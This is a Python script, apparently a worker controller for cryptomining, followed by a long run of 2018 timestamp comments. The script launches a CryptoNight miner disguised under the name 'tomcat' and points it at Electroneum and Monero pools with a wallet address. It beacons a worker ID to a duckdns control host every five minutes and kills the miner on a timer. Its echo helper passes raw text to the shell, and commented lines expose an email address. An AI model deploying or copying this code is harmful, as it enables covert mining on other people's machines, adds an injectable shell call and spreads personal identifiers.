import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:40:06.538164
#2018-02-17 17:27:07.360061
#2018-02-17 19:17:03.219061
#2018-02-17 21:06:07.616904
#2018-02-17 22:50:06.413059
#2018-02-18 00:35:09.230288
#2018-02-18 02:27:04.297817
#2018-02-18 04:14:04.019565
#2018-02-18 06:04:08.304064
#2018-02-18 07:57:05.651899
#2018-02-18 09:44:06.857009
#2018-02-18 11:31:05.965590
#2018-02-18 13:17:04.061933
#2018-02-18 15:07:01.764146
#2018-02-18 16:54:06.246856
#2018-02-18 18:43:06.287355
#2018-02-18 20:30:04.442890
#2018-02-18 22:15:08.189244
#2018-02-19 00:05:01.455117
#2018-02-19 01:51:02.143337
#2018-02-19 03:38:02.001191
#2018-02-19 05:23:06.742040
#2018-02-19 07:11:05.896544
#2018-02-19 08:59:01.990451
#2018-02-19 10:48:02.156329
#2018-02-19 12:36:09.385193
#2018-02-19 14:24:06.612526
#2018-02-19 16:14:06.149347
#2018-02-19 18:01:06.292906
#2018-02-19 19:49:06.982085
#2018-02-19 21:38:06.521871
#2018-02-19 23:24:08.005156
#2018-02-20 01:11:01.891890
#2018-02-20 03:01:08.534888
#2018-02-20 04:48:03.814507
#2018-02-20 06:32:05.432536
#2018-02-20 08:17:03.798606
#2018-02-20 10:02:08.280313
#2018-02-20 11:48:05.227944
#2018-02-20 13:36:02.015448
#2018-02-20 15:20:01.352083
#2018-02-20 17:06:08.521975
#2018-02-20 18:56:01.578550
#2018-02-20 20:46:09.470200
#2018-02-20 22:30:07.176888
#2018-02-21 00:11:04.032052
#2018-02-21 01:58:02.098496
#2018-02-21 03:48:05.665953
#2018-02-21 05:31:07.562568
#2018-02-21 07:20:08.912916
#2018-02-21 09:05:01.405694
#2018-02-21 10:53:01.671978
#2018-02-21 12:39:01.934798
#2018-02-21 14:27:01.476837
#2018-02-21 16:13:03.032996
#2018-02-21 18:03:06.591315
#2018-02-21 19:50:07.408514
#2018-02-21 21:38:07.148322
#2018-02-21 23:24:08.009608
#2018-02-22 01:13:01.365793
#2018-02-22 03:02:06.365377
#2018-02-22 04:47:03.921866
#2018-02-22 06:32:05.593376
#2018-02-22 08:19:08.481117
#2018-02-22 10:08:01.607826
#2018-02-22 11:54:04.791383
#2018-02-22 13:39:01.784485
#2018-02-22 15:28:06.563968
#2018-02-22 17:16:05.128943
#2018-02-22 19:03:05.722053
#2018-02-22 20:56:01.467479
#2018-02-22 22:42:01.486370
#2018-02-23 00:29:04.000037
#2018-02-23 02:16:01.480694
#2018-02-23 04:04:06.532186
#2018-02-23 05:50:07.021830
#2018-02-23 07:40:03.977161
#2018-02-23 09:42:08.269417
#2018-02-23 11:46:13.519175
#2018-02-23 13:36:05.715266
#2018-02-23 15:23:09.033600
#2018-02-23 17:10:07.044855
#2018-02-23 18:56:01.966046
#2018-02-23 20:42:07.680833
#2018-02-23 22:31:05.727698
#2018-02-24 00:17:07.256018
#2018-02-24 02:08:02.200600
#2018-02-24 03:57:05.443850
#2018-02-24 06:43:01.341661
#2018-02-24 08:33:07.043483
#2018-02-24 10:20:08.155034
#2018-02-24 12:15:07.940183
#2018-02-24 14:06:05.298306
#2018-02-24 15:53:06.576619
#2018-02-24 17:47:01.757406
#2018-02-24 19:34:01.989169
#2018-02-24 21:22:01.945299
#2018-02-25 00:02:05.520837
#2018-02-25 03:17:03.926332
#2018-02-25 07:01:05.116591